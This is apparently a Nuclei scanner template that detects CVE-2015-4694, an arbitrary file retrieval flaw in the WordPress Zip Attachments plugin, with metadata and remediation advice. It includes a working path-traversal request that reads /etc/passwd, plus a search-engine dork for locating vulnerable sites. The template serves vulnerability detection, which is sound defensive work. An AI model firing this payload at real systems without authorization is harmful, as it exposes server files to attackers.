id: CVE-2015-4694

info:
  name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval
  author: 0x_Akoko
  severity: high
  description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file.
  impact: |
    Arbitrary file retrieval
  remediation: |
    Update to the latest version of the WordPress Zip Attachments plugin (1.1.4) or remove the plugin if not needed.
  reference:
    - https://wordpress.org/plugins/zip-attachments/#developers
    - https://wpscan.com/vulnerability/8047
    - https://nvd.nist.gov/vuln/detail/CVE-2015-4694
    - http://www.vapid.dhs.org/advisory.php?v=126
    - https://wordpress.org/plugins/zip-attachments/changelog/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2015-4694
    cwe-id: CWE-22
    epss-score: 0.02304
    epss-percentile: 0.88593
    cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: zip_attachments_project
    product: zip_attachments
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/zip-attachments"
  tags: cve2015,cve,wp-plugin,wpscan,lfi,wordpress,zip_attachments_project

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a004630440220207ba0410481b90cdbf301df5d34518b015c8ec9366803c31be44661113a9e01022044ad895219f4df49dc7037ad7b8420987cde05403fb36fe58603419476a063b2:922c64590222798bb761d5b6d8e72950